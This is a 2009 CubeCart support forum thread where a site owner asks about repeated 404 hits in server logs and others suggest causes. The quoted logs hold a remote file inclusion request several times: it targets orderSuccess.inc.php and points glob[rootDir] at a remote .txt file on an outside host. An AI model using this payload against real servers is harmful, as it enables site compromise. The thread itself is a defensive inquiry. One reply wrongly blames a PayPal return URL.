What does this mean? Keep getting hits to this URL

[Guest aliceaod]

I recently removed my cube cart store because I'm not selling what I was selling anymore but I do use cubecart at another site, so this has me concerned.

Since I removed the one store I'm getting a ton of 404 Errors being generated from bots (or something) hitting the following URI and I don't know what this means. I finally had to put a "banme.php" on the addy to make them stop.

What is this addy and why are they going there? I tried to google it but didn't find anything.

Is it some kind of way people are trying to download the digital files I once was selling and were downloading them for free?

Greetings! From BanMe.php: Banned--10/11/09 10:51:58 AM CDT. I banned IP 61.19.245.143 from the requested URI www.webgeek-design.com//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt? They came from referrer [ ] with user agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)

The following error was received on Sunday, October 11, 2009 - 09:00:58 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

The following error was received on Sunday, October 11, 2009 - 09:00:58 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

The following error was received on Sunday, October 11, 2009 - 08:55:38 AM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://moncosZ.fileave.com/pirid1.txt?

Referring URL: "http://www.webgeek-design.com"

IP Address: 122.155.5.84

(122.155.5.84 generated over 20 Errors of this nature)

[Robsta]

Your files may have been tampered with. Look for PHP files with newly edited dates on them, clean or replace with shipped versions.

[Guest aliceaod]

Thanks but as stated, I totally removed the store so don't have the files any more and I have absolutely no idea how long this has been going on. I'll check any back ups that I might still have to see if I can find anything there.

I replaced all the files with the last cubecart update so if it did happen, it would have been after the latest release came out (and I updated shortly after it was released).

<shrug>

I googled http://moncosZ.fileave.com/pirid1.txt? and it shows up all over the place but no one explaining what it is.

[Robsta]

The TXT file will likely be HTML to display in the page.

The message above is referencing includes/orderSuccess.inc.php, so look in there. If it's clean, and dated the same as the shipped version, then contact your hosting company as they will need to know their server may have been compromised.

[Guest aliceaod]

The TXT file will likely be HTML to display in the page.

The message above is referencing includes/orderSuccess.inc.php, so look in there. If it's clean, and dated the same as the shipped version, then contact your hosting company as they will need to know their server may have been compromised.

Thanks. I'll do a winmerge on the back up that I have with the shipped version since the date is the same...so IDK...but thanks yeah I'll tell my web host.

[Guest aliceaod]

The files were identical and so were the dates. I informed my web host.

[Guest aliceaod]

Here is their brilliant answer:

Regarding 404 error, it is because there is no such page available. Seems your script banme.php is sending emails to you. If you don't want to receive emails you can rename that file.

hhhoooookay then, fine. I'm not going to worry about it.

But, still I'd love to know what that is. I got another one today

The following error was received on Monday, October 12, 2009 - 03:11:19 PM CDT

Error 404 - Page Not Found

Requested URL: http://www.webgeek-design.com/%20%20//includes/orderSuccess

Referring URL: "http://www.webgeek-design.com"

IP Address: 203.193.165.130

Are they looking for an exploit? Is that what this is?

[Guest]

What payment gateways did you use for the old store? The confirmed.php is what is called after an order is placed and your payment gateway reports the sale back to cubecart. You said you moved the store - did you change the configuration of all your payment gateways to reflect the new URL?

It looks to me like you forgot to change the "return to store" url for a gateway and people are trying to place orders (or are placing them) and the gateway is sending them to the old URL.

[Guest aliceaod]

What payment gateways did you use for the old store? The confirmed.php is what is called after an order is placed and your payment gateway reports the sale back to cubecart. You said you moved the store - did you change the configuration of all your payment gateways to reflect the new URL?

It looks to me like you forgot to change the "return to store" url for a gateway and people are trying to place orders (or are placing them) and the gateway is sending them to the old URL.

The payment gateway was PayPal.

Thanks for trying to help, but I think you misunderstand. What I did was I removed the store. It's gone, bye bye, adios, c ya, no longer exists, defunct, closed, shut down, files deleted. I am, however, using the same CubeCart script at another domain selling entirely different products and with these weird errors I was getting at webgeek, I was concerned about the other one because I didn't know if this was something trying to find an exploit or was actually successful at it.

I found something interesting today...I am also getting 404 errors at a totally unrelated site that mention a miomatrimonio.com with a .txt file in the URI, like this monocosZ thing. I googled miomatrimonio.com, apparently what is happening at webgeek IS an attack on the server, it's just that they are failing. The scarey part is that if they are successful, I'd have no way of knowing...would I?

Here's the BOT LIST I found mentioning the miomatrimonio thing http://simaps.net/

[Guest]

Right, I understand that you moved the cart files to a different domain. In Paypal though, there is a setting for "return to url" - did you perhaps forget to change the domain name there to the new site? If so, it would be trying to find the confirmed.php file on the domain where the file no longer exists - hense the message you are getting.

I tried to find it in Paypal, but cannot find the setting. It's there somewhere.

[Guest aliceaod]

Right, I understand that you moved the cart files to a different domain. In Paypal though, there is a setting for "return to url" - did you perhaps forget to change the domain name there to the new site? If so, it would be trying to find the confirmed.php file on the domain where the file no longer exists - hense the message you are getting.

I tried to find it in Paypal, but cannot find the setting. It's there somewhere.

Thanks for trying to help, but my bad for not being more clear.

I did not move anything to another domain.

The error messages I am getting are not PayPal error messages. They are attempted attacks on my server.

[Robsta]

Topic closed at the request of the topic starter. Issue resolved.